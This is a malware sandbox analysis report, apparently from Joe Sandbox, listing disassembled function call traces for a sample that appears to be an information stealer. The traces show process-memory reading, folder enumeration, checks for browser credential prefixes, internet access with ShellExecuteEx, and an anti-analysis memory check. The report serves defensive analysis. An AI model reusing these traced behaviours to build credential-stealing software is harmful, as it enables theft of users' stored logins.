                                          • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                          • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                          • String ID:
                                          • API String ID: 2005412495-0
                                          • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                          • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                          • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                          • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                          APIs
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022C9C53
                                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 022C9C78
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 022C9C98
                                          • ReadFile.KERNEL32(000000FF,?,00000000,022C16F6,00000000), ref: 022C9CC1
                                          • LocalFree.KERNEL32(022C16F6), ref: 022C9CF7
                                          • CloseHandle.KERNEL32(000000FF), ref: 022C9D01
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                          • String ID:
                                          • API String ID: 2311089104-0
                                          • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                          • Instruction ID: 66340b479cdd5baed72733c4df24caa0cd227199c8bb622ef5b09188cb081298
                                          • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                          • Instruction Fuzzy Hash: 16311878A10209EFDB14CFD4C884BAE77F5FB48704F208258E911A7294C775AA81CFA1
                                          APIs
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                          • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                          • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                          • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                          • String ID:
                                          • API String ID: 2311089104-0
                                          • Opcode ID: 41a9ac40214c004258481c146167ca84ac173594ef3507387ebcdc5aa67caad4
                                          • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                          • Opcode Fuzzy Hash: 41a9ac40214c004258481c146167ca84ac173594ef3507387ebcdc5aa67caad4
                                          • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                          APIs
                                          • __getptd.LIBCMT ref: 022DCC51
                                            • Part of subcall function 022DC206: __getptd_noexit.LIBCMT ref: 022DC209
                                            • Part of subcall function 022DC206: __amsg_exit.LIBCMT ref: 022DC216
                                          • __amsg_exit.LIBCMT ref: 022DCC71
                                          • __lock.LIBCMT ref: 022DCC81
                                          • InterlockedDecrement.KERNEL32(?), ref: 022DCC9E
                                          • free.MSVCRT ref: 022DCCB1
                                          • InterlockedIncrement.KERNEL32(0042B980), ref: 022DCCC9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                          • String ID:
                                          • API String ID: 634100517-0
                                          • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                          • Instruction ID: 724efa9bc9780111eb81be7326f56957f58816a063e5908d7753ef8685db065a
                                          • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                          • Instruction Fuzzy Hash: 78014532E20B26EBCB20ABE4944875D73A1FF04714F010527ED14672B8CB746441DFD9
                                          APIs
                                          • __getptd.LIBCMT ref: 0041C9EA
                                            • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                            • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                          • __amsg_exit.LIBCMT ref: 0041CA0A
                                          • __lock.LIBCMT ref: 0041CA1A
                                          • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                          • free.MSVCRT ref: 0041CA4A
                                          • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                          • String ID:
                                          • API String ID: 634100517-0
                                          • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                          • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                          • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                          • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                          APIs
                                          • strlen.MSVCRT ref: 022D7186
                                          • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,022D7401,00000000,00420BA8,00000000,00000000), ref: 022D71B4
                                            • Part of subcall function 022D6E37: strlen.MSVCRT ref: 022D6E48
                                            • Part of subcall function 022D6E37: strlen.MSVCRT ref: 022D6E6C
                                          • VirtualQueryEx.KERNEL32(022D7574,00000000,?,0000001C), ref: 022D71F9
                                          • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022D7401), ref: 022D731A
                                            • Part of subcall function 022D7047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 022D705F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: strlen$MemoryProcessQueryReadVirtual
                                          • String ID: @
                                          • API String ID: 2950663791-2766056989
                                          • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                          • Instruction ID: a3b63e315334c17cbb3c86e693517cf60f89560a15997513b9f1cc40199f20f6
                                          • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                          • Instruction Fuzzy Hash: C251E4B1E1010AEBDB04CFD8D981AEFB7B6BF88300F148519F915A7244D778EA11CBA5
                                          APIs
                                          • strlen.MSVCRT ref: 00416F1F
                                          • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                            • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                            • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                          • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                          • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                            • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: strlen$MemoryProcessQueryReadVirtual
                                          • String ID: @
                                          • API String ID: 2950663791-2766056989
                                          • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                          • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                          • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                          • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                          APIs
                                          • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: *n@$*n@
                                          • API String ID: 1029625771-193229609
                                          • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                          • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                          • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                          • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                          APIs
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                            • Part of subcall function 022DAA07: lstrcpy.KERNEL32(?,00000000), ref: 022DAA4D
                                            • Part of subcall function 022C6307: InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 022C6376
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 022D342C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrcat$ExecuteInternetOpenShelllstrlen
                                          • String ID: <$@Ly$/y$0y
                                          • API String ID: 3003401316-1122373644
                                          • Opcode ID: 9c7af7c407a05955023c59048f2131a67dba8825191ad258bddab0558431ef10
                                          • Instruction ID: 19c707b61c3f4d08861217dbf441928f7fd1ab52c867ff45915cac7a99f1e615
                                          • Opcode Fuzzy Hash: 9c7af7c407a05955023c59048f2131a67dba8825191ad258bddab0558431ef10
                                          • Instruction Fuzzy Hash: AD412D719203089BCB09FFE4DD91EEEB77AAF24300F144259E10266198EF345B8ACF91
                                          APIs
                                          • lstrcat.KERNEL32(?,0064A30C), ref: 022D4A42
                                            • Part of subcall function 022D9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022D9072
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D4A68
                                          • lstrcat.KERNEL32(?,?), ref: 022D4A87
                                          • lstrcat.KERNEL32(?,?), ref: 022D4A9B
                                          • lstrcat.KERNEL32(?,0064A284), ref: 022D4AAE
                                          • lstrcat.KERNEL32(?,?), ref: 022D4AC2
                                          • lstrcat.KERNEL32(?,0064A2C8), ref: 022D4AD6
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022D8FF7: GetFileAttributesA.KERNEL32(00000000,?,022C1DBB,?,?,0042565C,?,?,00420E1F), ref: 022D9006
                                            • Part of subcall function 022D47D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022D47E7
                                            • Part of subcall function 022D47D7: RtlAllocateHeap.NTDLL(00000000), ref: 022D47EE
                                            • Part of subcall function 022D47D7: wsprintfA.USER32 ref: 022D480D
                                            • Part of subcall function 022D47D7: FindFirstFileA.KERNEL32(?,?), ref: 022D4824
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                          • String ID:
                                          • API String ID: 2540262943-0
                                          • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                          • Instruction ID: cadea016e68a088e8686ea5b099afabf0342305d98d1ef4fc7daef4d150f59a9
                                          • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                          • Instruction Fuzzy Hash: 77317EF6A50308ABDB10FBF0CC88EED737AAB58700F404589B24596084EEB5D789CF95
                                          APIs
                                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                          • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                          • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                          • lstrcatA.KERNEL32(?,00793190), ref: 00414FAB
                                          • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                            • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                            • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                            • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                          • String ID: `1y
                                          • API String ID: 2667927680-1477631000
                                          • Opcode ID: 33ad484c41b3b6fcfe3cd09fe7520dfc9098197ce8bfaf1b05ec43d91c9f3575
                                          • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                          • Opcode Fuzzy Hash: 33ad484c41b3b6fcfe3cd09fe7520dfc9098197ce8bfaf1b05ec43d91c9f3575
                                          • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022C14A5
                                          • __aulldiv.LIBCMT ref: 022C14BF
                                          • __aulldiv.LIBCMT ref: 022C14CD
                                          • ExitProcess.KERNEL32 ref: 022C14FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                          • String ID: @
                                          • API String ID: 3404098578-2766056989
                                          • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                          • Instruction ID: 33a6c344ba78a30960a79b8edc2f42a7ee42ff911cc29e0aa38d66534d303edf
                                          • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                          • Instruction Fuzzy Hash: 1A016DB0A60308FAEF20DBD0CC8AB9DBB79AB00705F208548E709772C4D7B495518B55
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                            • Part of subcall function 022DAA07: lstrcpy.KERNEL32(?,00000000), ref: 022DAA4D
                                            • Part of subcall function 022CA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022CA094
                                          • lstrlen.KERNEL32(00000000), ref: 022CBC29
                                          • lstrlen.KERNEL32(00000000), ref: 022CBC3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$lstrcat$memcmp
                                          • String ID: .y$`/y$.y
                                          • API String ID: 3457870978-400968446
                                          • Opcode ID: 01b2ef90f01bc47b2fe592b36b8eab2b6e7c3ba8e1b3c58c6169bf1efef8d7f9
                                          • Instruction ID: 8efb19c1d95979cdb3c7460a5b5126af948fda3edd6f57b4a7203c87ca31f96a
                                          • Opcode Fuzzy Hash: 01b2ef90f01bc47b2fe592b36b8eab2b6e7c3ba8e1b3c58c6169bf1efef8d7f9
                                          • Instruction Fuzzy Hash: AEE10E72920358ABCB18EBE4DD91DEEB33ABF64304F54465DE106621A4EF346B48CF61
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                          • lstrlenA.KERNEL32(00000000), ref: 0040B9C2
                                          • lstrlenA.KERNEL32(00000000), ref: 0040B9D6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$lstrcat$memcmp
                                          • String ID: .y$`/y$.y
                                          • API String ID: 3457870978-400968446
                                          • Opcode ID: b35ef5ffff2ebef4a674bd031d89a2127a116eec87523aabcc3d7d4ff4cc14f4
                                          • Instruction ID: 4e9d2fdd6b59a5819e0b0cc177d60c70936eaf215788bcf9b06e28604354d71c
                                          • Opcode Fuzzy Hash: b35ef5ffff2ebef4a674bd031d89a2127a116eec87523aabcc3d7d4ff4cc14f4
                                          • Instruction Fuzzy Hash: EEE133729111189BDB04FBA1CD92EEE7339AF14314F40456EF50672091EF386B9ACB7A
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                            • Part of subcall function 022DAA07: lstrcpy.KERNEL32(?,00000000), ref: 022DAA4D
                                            • Part of subcall function 022CA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022CA094
                                          • lstrlen.KERNEL32(00000000), ref: 022CBF06
                                            • Part of subcall function 022D9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022D90B9
                                          • StrStrA.SHLWAPI(00000000,004213E0), ref: 022CBF34
                                          • lstrlen.KERNEL32(00000000), ref: 022CC00C
                                          • lstrlen.KERNEL32(00000000), ref: 022CC020
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                          • String ID: .y
                                          • API String ID: 1440504306-3337573416
                                          • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                          • Instruction ID: fde10396d3e6fb901efb89fc951a134576252aa7621381b073d9afe15e39da9c
                                          • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                          • Instruction Fuzzy Hash: B3B14171920308ABCB18FBE4DD95EEE733AAF24304F54465DE506A2194EF386B48CF61
                                          APIs
                                          • memcmp.MSVCRT(?,00421264,00000003), ref: 022CA094
                                            • Part of subcall function 022DAA07: lstrcpy.KERNEL32(?,00000000), ref: 022DAA4D
                                            • Part of subcall function 022D0CC7: memset.MSVCRT ref: 022D0E83
                                            • Part of subcall function 022D0CC7: lstrcat.KERNEL32(?,00000000), ref: 022D0E9C
                                            • Part of subcall function 022D0CC7: lstrcat.KERNEL32(?,00420D7C), ref: 022D0EAE
                                            • Part of subcall function 022D0CC7: lstrcat.KERNEL32(?,00000000), ref: 022D0EC4
                                            • Part of subcall function 022D0CC7: lstrcat.KERNEL32(?,00420D80), ref: 022D0ED6
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                          • memcmp.MSVCRT(?,00421114,00000003), ref: 022CA116
                                          • memset.MSVCRT ref: 022CA14F
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 022CA1A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
